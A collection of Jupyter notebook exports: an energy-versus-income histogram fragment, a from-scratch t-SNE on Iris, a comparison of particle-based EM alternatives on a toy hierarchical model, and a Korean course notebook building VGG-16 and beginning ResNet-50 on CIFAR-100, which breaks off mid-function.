high_energy_2000['2000_income'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_income'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 120000)
plt.legend()
plt.title('Gap in income between high and low energy consumption countries')
plt.xlabel('average personal income in 2000 (GDP/capita, adjusted prices from 2011)', rotation=10)
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_income'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_income'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 120000)
plt.xlabel('average personal income in 2005 (GDP/capita, adjusted prices from 2011)', rotation=10)
plt.legend();
###Output
_____no_output_____
###Markdown
> Graphs showing gaps in income and urbanization tell us that divide between high anf low electricity countries remained almost the same in 2000 as in 2005. Which variable from tech indicators and income has the strongest correlation with electricity consumption?
###Code
cor2000 = merged[c2000].corr()
cor2000.iloc[:,:1]
cor2005 = merged[c2005].corr()
cor2005.iloc[:,:1]
###Output
_____no_output_____ |
decomposition/tsne/iris.ipynb | ###Markdown
http://www.cs.toronto.edu/~hinton/absps/tsne.pdf
###Code
import numpy as np
from matplotlib import animation
import matplotlib.pyplot as plt
from IPython.display import HTML
from sklearn.preprocessing import LabelEncoder
import seaborn as sns
import pandas as pd
sns.set()
df = pd.read_csv('Iris.csv')
Y = df.iloc[:,-1]
df = df.iloc[:,1:-1]
df.head()
labels = np.unique(Y)
Y = LabelEncoder().fit_transform(Y)
def pca(X, dims=50):
X = X - np.tile(np.mean(X, 0), (X.shape[0], 1))
_, eigenvectors = np.linalg.eig(np.dot(X.T, X))
Y = np.dot(X, eigenvectors[:, :dims])
return Y
def pairwise_matrix(X):
sum_square_X = np.sum(np.square(X), 1)
return (-2 * np.dot(X, X.T) + sum_square_X).T + sum_square_X
def calculate_entropy_and_P(X, variance):
P = np.exp(-X * variance)
sum_P = np.sum(P)
P = P / sum_P
H = -np.sum(np.log(P) * P)
return H, P
def calculate_nearest_perplexity(X, toleration=1e-5, perplexity=30,tried=50):
ori_pairwise = pairwise_matrix(X)
empty_pairwise = np.zeros((X.shape[0], X.shape[0]))
sigmas = np.ones((X.shape[0]))
log_P = np.log(perplexity)
for i in range(X.shape[0]):
if (i+1) % 100 == 0:
print("Computing P-values for point %d of %d" % (i+1, X.shape[0]))
sigma_min = -np.inf
sigma_max = np.inf
pairwise_i = ori_pairwise[i, np.setxor1d(np.arange(X.shape[0]),[i])]
H, P_pairwise_i = calculate_entropy_and_P(pairwise_i, sigmas[i])
H_diff = H - log_P
tries = 0
while np.abs(H_diff) > toleration and tries < tried:
if H_diff > 0:
sigma_min = sigmas[i]
if sigma_max == np.inf or sigma_max == -np.inf:
sigmas[i] *= 2
else:
sigmas[i] = (sigmas[i] + sigma_max) / 2
else:
sigma_max = sigmas[i]
if sigma_min == np.inf or sigma_min == -np.inf:
sigmas[i] /= 2
else:
sigmas[i] = (sigmas[i] + sigma_min) / 2
H, P_pairwise_i = calculate_entropy_and_P(pairwise_i, sigmas[i])
H_diff = H - log_P
tries += 1
empty_pairwise[i, np.setxor1d(np.arange(X.shape[0]),[i])] = P_pairwise_i
return empty_pairwise
def TSNE(X, dimensions=2, pca_dimensions=50, perplexity=30, min_learning_rate=0.001,
iterations=500, initial_momentum=0.5, final_momentum=0.9):
X = pca(X, dims=pca_dimensions)
Y = np.random.randn(X.shape[0], dimensions)
dY = np.zeros((X.shape[0], dimensions))
velocity_Y = np.zeros((X.shape[0], dimensions))
learning_rate = np.zeros((X.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(X, toleration=1e-5, perplexity=perplexity)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
ratio = 500
for i in range(iterations):
sum_Y = np.sum(np.square(Y), 1)
num = -2. * np.dot(Y, Y.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(X.shape[0]), range(X.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(X.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (Y[n, :] - Y), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
Y = Y + velocity_Y
Y = Y - np.tile(np.mean(Y, 0), (X.shape[0], 1))
if i == 100:
pairwise = pairwise / 4
return Y
tsne = TSNE(df.values)
plt.figure(figsize=(10,5))
for no, i in enumerate(np.unique(Y)):
plt.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no])
plt.legend()
plt.show()
tsne_3d = TSNE(df.values, dimensions=3)
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111, projection='3d')
for no, i in enumerate(np.unique(Y)):
ax.scatter(tsne_3d[Y==i,0], tsne_3d[Y==i,1], tsne_3d[Y==i,2], label=labels[no])
plt.legend()
plt.show()
dimensions = 2
ratio = 500
min_learning_rate = 0.001
initial_momentum = 0.5
final_momentum = 0.9
iterations = 300
fig = plt.figure(figsize=(13,8))
ax = plt.axes()
tsne = np.random.randn(df.shape[0], dimensions)
dY = np.zeros((df.shape[0], dimensions))
velocity_Y = np.zeros((df.shape[0], dimensions))
learning_rate = np.zeros((df.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(df.values, toleration=1e-5, perplexity=30)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
scatters = []
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters.append(ax.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no]))
ax.legend()
ax.set_xlabel('epoch: %d'%(0))
ax.axis([min_x, max_x, min_y, max_y])
def train_TSNE(epoch):
global dY, tsne, velocity_Y, pairwise, initial_momentum, learning_rate
sum_Y = np.sum(np.square(tsne), 1)
num = -2. * np.dot(tsne, tsne.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(df.shape[0]), range(df.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(df.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (tsne[n, :] - tsne), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
tsne = tsne + velocity_Y
tsne = tsne - np.tile(np.mean(tsne, 0), (df.shape[0], 1))
if epoch == 100:
pairwise = pairwise / 4
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters[no].set_offsets([tsne[Y==i,0], tsne[Y==i,1]])
ax.set_xlabel('epoch: %d'%(epoch))
ax.axis([min_x, max_x, min_y, max_y])
return scatters, ax
anim = animation.FuncAnimation(fig, train_TSNE, frames=iterations, interval=200)
anim.save('animation-tsne-iris.gif', writer='imagemagick', fps=10)
dimensions=2
pca_dimensions=50
min_learning_rate=0.001
iterations=500
fig = plt.figure(figsize=(13,8))
ax = plt.axes()
tsne = np.random.randn(df.shape[0], dimensions)
scatters = []
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters.append(ax.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no]))
ax.legend()
ax.set_xlabel('perplexity: %d'%(0))
ax.axis([min_x, max_x, min_y, max_y])
def train_TSNE_perplexity(epoch):
initial_momentum=0.5
final_momentum=0.9
X = pca(df, dims=pca_dimensions)
tsne = np.random.randn(X.shape[0], dimensions)
dY = np.zeros((X.shape[0], dimensions))
velocity_Y = np.zeros((X.shape[0], dimensions))
learning_rate = np.zeros((X.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(X, toleration=1e-5, perplexity=epoch)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
ratio = 500
for i in range(iterations):
sum_Y = np.sum(np.square(tsne), 1)
num = -2. * np.dot(tsne, tsne.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(X.shape[0]), range(X.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(X.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (tsne[n, :] - tsne), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
tsne = tsne + velocity_Y
tsne = tsne - np.tile(np.mean(tsne, 0), (X.shape[0], 1))
if i == 100:
pairwise = pairwise / 4
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters[no].set_offsets([tsne[Y==i,0], tsne[Y==i,1]])
ax.set_xlabel('perplexity: %d'%(epoch))
ax.axis([min_x, max_x, min_y, max_y])
return scatters, ax
anim = animation.FuncAnimation(fig, train_TSNE_perplexity, frames=100, interval=200)
anim.save('animation-tsne-perplexity-iris.gif', writer='imagemagick', fps=10)
###Output
/usr/local/lib/python3.5/dist-packages/ipykernel_launcher.py:5: RuntimeWarning: divide by zero encountered in log
"""
/usr/local/lib/python3.5/dist-packages/ipykernel_launcher.py:5: RuntimeWarning: invalid value encountered in multiply
"""
|
toy_hierarchical_model.ipynb | ###Markdown
**Description:** This notebook demonstrates the application of PGA, PQN, PMGA, and EM to the toy hierarchical model in Example 1 of [Scalable particle-based alternatives to EM](https://juankuntz.github.io/publication/parem/) and reproduces Figures 1 and 2 therein. Figure 1 To start, we load the modules we need and implement the algorithms. The algorithms take the following inputs:* y : D-dimensional vector of observations,* h : step-size,* K : number of steps,* N : number of particles,* th : 1-dimensional vector containing the initial parameter guess,* X : D x N matrix containing the initial particle cloud;and return a single output:* th : K-dimensional vector of parameter estimates.
###Code
#@title Load modules.
import numpy as np # Numpy for computations.
import matplotlib.pyplot as plt # Pyplot for plots.
#@title Implement algorithms.
# Algorithms.
def pga(y, h, K, N, th, X):
"""Particle Gradient Ascent Algorithm. Returns parameter estimates."""
D = y.size # Extract dimension of latent variables.
for k in range(K):
# Update parameter estimate:
th = np.append(th, th[k] + h*ave_grad_th(th[k], X))
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
return th
def pqn(y, h, K, N, th, X):
"""Particle Quasi-Newton Algorithm. Returns parameter estimates."""
D = y.size # Extract dimension of latent variables.
for k in range(K):
# Update parameter estimate:
th = np.append(th, th[k]
+ h*(ave_neg_hess_th(D)**-1)*ave_grad_th(th[k], X))
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
return th
def pmga(y, h, K, N, X):
"""Particle Marginal Gradient Ascent Algorithm.
Returns parameter estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
for k in range(K):
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
th = np.append(th, theta_opt(X)) # Update parameter estimate.
return th
def em(y, K, th):
"""Expectation Maximization Algorithm. Returns parameter estimates."""
for k in range(K):
th = np.append(th, th[k]/2 + y.mean()/2) # Update parameter estimate.
return th
# Auxiliary functions.
def theta_opt(X):
return X.mean() # Return optimal parameter for particle cloud X.
def ave_grad_th(th, X):
"""Returns theta-gradient of log density averaged over particles."""
return X[:, 0].size*(theta_opt(X) - th)
def ave_neg_hess_th(D):
"""Returns negative-theta-Hessian of log density averaged over particles.
"""
return D
def grad_x(y, th, X):
"""Returns x-gradient of log density vectorized over particles."""
return (y + th - 2*X)
###Output
_____no_output_____
###Markdown
Next, we choose the model parameters and we generate synthetic data:
###Code
D = 100 # Dimensionality of latent variables.
thdata = 1 # Parameter value used to generate the data.
# Generate the data:
y = np.random.normal(0, 1, (D, 1)) + np.random.normal(thdata, 1, (D, 1))
###Output
_____no_output_____
###Markdown
Figure 1a We examine the impact that different step-sizes have on PGA's stability:
###Code
#Set approximation parameters:
K = 300 # Number of steps.
N = 10 # Number of particles.
th0 = np.array([0]) # Initial parameter guess.
X0 = np.zeros((D, N)) # Initial particle cloud.
# Run PGA using three different step-sizes:
th_large = pga(y, 2.05/(2+D), K, N, th0, X0) # Large step-size
th_optimal = pga(y, 2/(2+D), K, N, th0, X0) # Optimal step-size
th_small = pga(y, 0.75/(2+D), K, N, th0, X0) # Small step-size
# Plot parameter estimates as a function of step number k:
plt.plot(th_large, label='Large step-size')
plt.plot(th_optimal, label='Optimal step-size')
plt.plot(th_small, label='Small step-size')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.ylim([0, 1.2*y.mean()])
plt.xlim([0, K])
###Output
_____no_output_____
###Markdown
Figure 1b,c We compare the performance of PGA, PQN, PMGA, and EM:
###Code
# Run the algorithms using the optimal step-sizes:
th_pga = pga(y, 2/(2+D), K, N, th0, X0)
th_pqn = pqn(y, 2/3, K, N, th0, X0)
th_pmga = pmga(y, 1, K, N, X0)
th_em = em(y, K, th0)
# Plot parameter estimates as a function of step number k:
plt.plot(th_pga, label='PGA')
plt.plot(th_pqn, label='PQN')
plt.plot(th_pmga, label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
To extract converging estimates from PGA, PQN, and PMGA, we average over time (starting once the estimates reach stationarity). To this end, we use the following function that cumulatively averages all entries of a vector x past a threshold n:
###Code
#@title Cumulative mean.
def cmean(x, n):
"""Returns [x[0], ..., x[n-1], z[n], ..., z[K-1]], where N denotes x's size
and z[k] denotes the average of [x[n], ..., x[k]].
"""
if n == 0:
return np.cumsum(x[n:-1])/np.arange(1, x[n:-1].size + 1)
else:
return np.append(x[0:n-1],
np.cumsum(x[n:-1])/np.arange(1, x[n:-1].size + 1))
###Output
_____no_output_____
###Markdown
We then obtain the following:
###Code
plt.plot(cmean(th_pga, 150), label='PGA')
plt.plot(cmean(th_pqn, 15), label='PQN')
plt.plot(cmean(th_pmga, 5), label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Lastly, we zoom in to the first 30 time-steps to differentiate between the PQN, PMGA, and EM estimates:
###Code
plt.plot(cmean(th_pga, 150), label='PGA')
plt.plot(cmean(th_pqn, 15), label='PQN')
plt.plot(cmean(th_pmga, 5), label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-0.3, 30])
###Output
_____no_output_____
###Markdown
Figure 2 We investigate the asymptotic bias present in the variance of the posterior approximations produced by PMGA (time-averaged without burn-in). We focus on the uni-dimensional case (D=1) for which the bias is most pronounced. This requires generating new data:
###Code
D = 1 # Dimensionality of latent variables.
# Generate the data:
y = np.random.normal(0, 1, (D, 1)) + np.random.normal(thdata, 1, (D, 1))
###Output
_____no_output_____
###Markdown
Next, we tweak the PMGA code so that it returns (time-averaged without burn-in) variance estimates rather parameter estimates:
###Code
#@title Tweaked PMGA
def pmga_v(y, h, K, N, X):
"""Particle Marginal Gradient Ascent Algorithm.
Returns posterior variance estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
# Initialize the vectors that will contain the first two moments of the
# current particle cloud (required to compute the variance estimates):
mu1 = np.reshape(X.mean(1), (D, 1)) # First moment.
mu2 = np.reshape((X ** 2).mean(1), (D, 1)) # Second moment.
for k in range(K):
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
th = np.append(th, theta_opt(X)) # Update parameter estimate.
# Store moments:
mu1 = np.append(mu1, np.reshape(X.mean(1), (D, 1)), axis=1)
mu2 = np.append(mu2, np.reshape((X ** 2).mean(1), (D, 1)), axis=1)
# Compute time-averaged variance estimates as a function of k:
var = (np.cumsum(mu2)/np.arange(1, K + 2)
- (np.cumsum(mu1)/np.arange(1, K + 2)) ** 2)
return var
###Output
_____no_output_____
###Markdown
Figure 2a In our first plot, we examine the dependence of the bias on the particle number. To this end, we fix a small step-size and large step number. In short, the larger the particle number, the smaller the bias:
###Code
K = 20000 # Number of steps.
h = 0.015 # Step-size.
# Compute variance estimates:
var1 = pmga_v(y, h, K, 1, np.zeros((D, 1))) # Using 1 particle.
var2 = pmga_v(y, h, K, 2, np.zeros((D, 2))) # Using 2 particles.
var4 = pmga_v(y, h, K, 4, np.zeros((D, 4))) # Using 4 particles.
var50 = pmga_v(y, h, K, 50, np.zeros((D, 50))) # Using 50 particle.
var100 = pmga_v(y, h, K, 100, np.zeros((D, 100))) # Using 100 particle.
# Plot estimates:
plt.plot(var1, label='N = 1')
plt.plot(var2, label='N = 2')
plt.plot(var4, label='N = 4')
plt.plot(var50, label='N = 50')
plt.plot(var100, label='N = 100')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Figure 2b Next, we examine how the bias depends on the step-size. To do so, we fix large particle and step numbers. This time, the smaller the step-size, the smaller the bias:
###Code
N = 100 # Number of particles.
X0 = np.zeros((D, N)) # Initial particle cloud (with amended dimension).
# Compute variance estimates:
var05 = pmga_v(y, 1/2, K, N, X0) # Using a step-size of 1/2.
var025 = pmga_v(y, 1/4, K, N, X0) # Using a step-size of 1/4.
var0125 = pmga_v(y, 1/8, K, N, X0) # Using a step-size of 1/8.
var003 = pmga_v(y, 0.03, K, N, X0) # Using a step-size of 0.03.
var0015 = pmga_v(y, 0.015, K, N, X0) # Using a step-size of 0.015.
# Plot estimates:
plt.plot(var05, label='h = 1/2')
plt.plot(var025, label='h = 1/4')
plt.plot(var0125, label='h = 1/8')
plt.plot(var003, label='h = 0.03')
plt.plot(var0015, label='h = 0.015')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Figure 2c We can remove the bias stemming from the discretization of the time-axis by adding a population-wide accept-reject step. In other words, by running the following Metropolized version of PMGA:
###Code
#@title Metropolized PMGA (Algorithm 1 in Appendix I).
def pmga_mh(y, h, K, N, X):
"""Metropolized Particle Marginal Gradient Ascent Algorithm.
Returns posterior variance estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
# Initialize vectors containing the first two moments of the current
# particle cloud (required to compute the variance estimates):
mu1 = np.reshape(X.mean(1), (D, 1)) # First moment.
mu2 = np.reshape((X ** 2).mean(1), (D, 1)) # Second moment.
for k in range(K):
# Propose a new particle cloud:
Z = (X + h*grad_x(y, theta_opt(X), X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
# Accept-reject step:
if np.random.uniform(0, 1, 1) < accept(X, Z, y, h, N):
X = Z
th = np.append(th, theta_opt(X)) # Update parameter estimate.
# Store moments:
mu1 = np.append(mu1, np.reshape(X.mean(1), (D, 1)), axis=1)
mu2 = np.append(mu2, np.reshape((X ** 2).mean(1), (D, 1)), axis=1)
# Compute time-averaged variance estimates as a function of k:
var = (np.cumsum(mu2, axis=1)/np.arange(1, K + 2)
- (np.cumsum(mu1, axis=1)/np.arange(1, K + 2))**2)
return var # Returns the coordinate-wise variances as a function of k.
def accept(X, Z, y, h, N):
"""Computes acceptance probability for proposed moved X -> Z."""
thx = theta_opt(X)
thz = theta_opt(Z)
s = 1
for n in range(N):
x = X[:, [n]]
z = Z[:, [n]]
tempx = ((y - x).T@(y - x)/2 + (x - thx).T@(x - thx)/2
+ (z - x - h*(y + thx - 2*x)).T
@ (z - x - h*(y + thx - 2*x))/(4*h))
tempz = ((y - z).T@(y - z)/2 + (z - thz).T@(z - thz)/2
+ (x - z - h*(y + thz - 2*z)).T
@ (x - z - h*(y + thz - 2*z))/(4*h))
s = s*np.exp(tempx - tempz)
return np.minimum(1, s)
###Output
_____no_output_____
###Markdown
Regardless of the step-size h that we use, only bias stemming from the finite particle number N remains. However, for large particle numbers, we are forced to reduce the step-size to stop the acceptance probability from degenerating.
###Code
K = 10000 # Number of steps.
# Compute estimates:
var1 = pmga_mh(y, 1/2, K, 1, np.zeros((D, 1))) # h = 1/2 and N = 1.
var2 = pmga_mh(y, 1/2, K, 2, np.zeros((D, 2))) # h = 1/2 and N = 2.
var4 = pmga_mh(y, 1/2, K, 4, np.zeros((D, 4))) # h = 1/2 and N = 4.
var50 = pmga_mh(y, 1/4, K, 50, np.zeros((D, 50))) # h = 1/4 and N = 50.
# Plot estimates:
plt.plot(var1[0, :], label='N = 1')
plt.plot(var2[0, :], label='N = 2')
plt.plot(var4[0, :], label='N = 4')
plt.plot(var50[0, :], label='N = 50')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
plt.ylim([0, 1.2*var1[0, -1]])
###Output
_____no_output_____ |
FUNDAMENTALS/Node_22/[F-22] Only_LMS_Code_Blocks.ipynb | ###Markdown
22. 딥네트워크, 서로 뭐가 다른 거죠?**Computer Vision에 주로 사용되는 Convolutional Neural Network의 주요 개념 및 널리 사용되는 VGG, ResNet 등 네트워크 구조에 대해 알아본다.** 22-1. 들어가며 22-2. ImageNet Challenge 22-3. 딥네트워크의 시작 22-4. CNN을 잘쓰자 22-5. 멀리 있으면 잘 안 들려요 22-6. 지름길을 만들어주자 22-7. 딥네트워크 속속들이 22-8. Model API 22-9. VGG-16
###Code
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
# CIFAR100 데이터셋을 가져옵시다.
cifar100 = keras.datasets.cifar100
(x_train, y_train), (x_test, y_test) = cifar100.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
print("x_train:", len(x_train), "x_test:", len(x_test))
img_input = keras.Input(shape=(32, 32, 3))
x = keras.layers.Conv2D(16, 3, activation='relu')(img_input)
x = keras.layers.MaxPool2D((2,2))(x)
x = keras.layers.Conv2D(32, 3, activation='relu')(x)
x = keras.layers.MaxPool2D((2,2))(x)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(256, activation='relu')(x)
predictions = keras.layers.Dense(100, activation='softmax')(x)
model = keras.Model(inputs=img_input, outputs=predictions)
model.summary()
# 모델 학습!!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1) # 1 Epoch만 학습합니다.
# 첫 번째 블록(예시)
x = layers.Conv2D(64, (3, 3),
activation='relu',
padding='same',
name='block1_conv1')(img_input)
x = layers.Conv2D(64, (3, 3),
activation='relu',
padding='same',
name='block1_conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
print('첫 번째 블록 OK!!')
# 두 번째 블록
# [[YOUR CODE]]
x = layers.Conv2D(
128, (3, 3), activation='relu', padding='same', name='block2conv1')(x)
x = layers.Conv2D(
128, (3, 3), activation='relu', padding='same', name='block2conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
print('두 번째 블록 OK!!')
###Output
_____no_output_____
###Markdown
```python 정답 코드 두 번째 블록x = layers.Conv2D( 128, (3, 3), activation='relu', padding='same', name='block2conv1')(x)x = layers.Conv2D( 128, (3, 3), activation='relu', padding='same', name='block2conv2')(x)x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)```
###Code
# 세 번째 블록
# [[YOUR CODE]]
# Block 3
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv1')(x)
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv2')(x)
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
print('세 번째 블록 OK!!')
###Output
_____no_output_____
###Markdown
```python 정답 코드 세 번째 블록x = layers.Conv2D( 256, (3, 3), activation='relu', padding='same', name='block3conv1')(x)x = layers.Conv2D( 256, (3, 3), activation='relu', padding='same', name='block3conv2')(x)x = layers.Conv2D( 256, (3, 3), activation='relu', padding='same', name='block3conv3')(x)x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3pool')(x)```
###Code
# 네 번째 블록
# [[YOUR CODE]]
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv1')(x)
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv2')(x)
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4pool')(x)
print('네 번째 블록 OK!!')
###Output
_____no_output_____
###Markdown
```python 정답 코드 네 번째 블록x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block4conv1')(x)x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block4conv2')(x)x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block4conv3')(x)x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4pool')(x)```
###Code
# 다섯 번째 블록
# [[YOUR CODE]]
# Block 5
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv1')(x)
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv2')(x)
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
print('다섯 번째 블록 OK!!')
###Output
_____no_output_____
###Markdown
```python 정답 코드 다섯 번째 블록x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block5conv1')(x)x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block5conv2')(x)x = layers.Conv2D( 512, (3, 3), activation='relu', padding='same', name='block5conv3')(x)x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5pool')(x)```
###Code
# 여섯 번째 블록
# [Keras VGG16 코드 구현] 링크의 if include_top: 부분을 유심히 보세요
# [[YOUR CODE]]
print('여섯 번째 블록 OK!!')
# Classification block
x = layers.Flatten(name='flatten')(x)
x = layers.Dense(4096, activation='relu', name='fc1')(x)
x = layers.Dense(4096, activation='relu', name='fc2')(x)
classes=100
x = layers.Dense(classes, activation='softmax', name='predictions')(x) # CIFAR100을 위한 모델 Output
###Output
_____no_output_____
###Markdown
```python 정답 코드 여섯 번째 블록x = layers.Flatten(name='flatten')(x)x = layers.Dense(4096, activation='relu', name='fc1')(x)x = layers.Dense(4096, activation='relu', name='fc2')(x)classes=100x = layers.Dense(classes, activation='softmax', name='predictions')(x) CIFAR100을 위한 모델 Output휴, 수고 많으```
###Code
model = keras.Model(name="VGG-16", inputs=img_input, outputs=x)
model.summary()
# 모델 학습!!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1) # 1 Epoch만 학습합니다.
###Output
_____no_output_____
###Markdown
22-10. ResNet-50
###Code
# 추가로 import해야 할 패키지들을 먼저 가져옵니다.
from tensorflow.keras import backend, regularizers, initializers, models
# block 안에 반복적으로 활용되는 L2 regularizer를 선언해 줍니다.
def _gen_l2_regularizer(use_l2_regularizer=True, l2_weight_decay=1e-4):
return regularizers.l2(l2_weight_decay) if use_l2_regularizer else None
print('Resnet50 GoGo!!')
def conv_block(input_tensor,
kernel_size,
filters,
stage,
block,
strides=(2, 2),
use_l2_regularizer=True,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""A block that has a conv layer at shortcut.
Note that from stage 3,
the second conv layer at main path is with strides=(2, 2)
And the shortcut should have strides=(2, 2) as well
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
strides: Strides for the second conv layer in the block.
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
batch_norm_decay: Moment of batch norm layers.
batch_norm_epsilon: Epsilon of batch borm layers.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
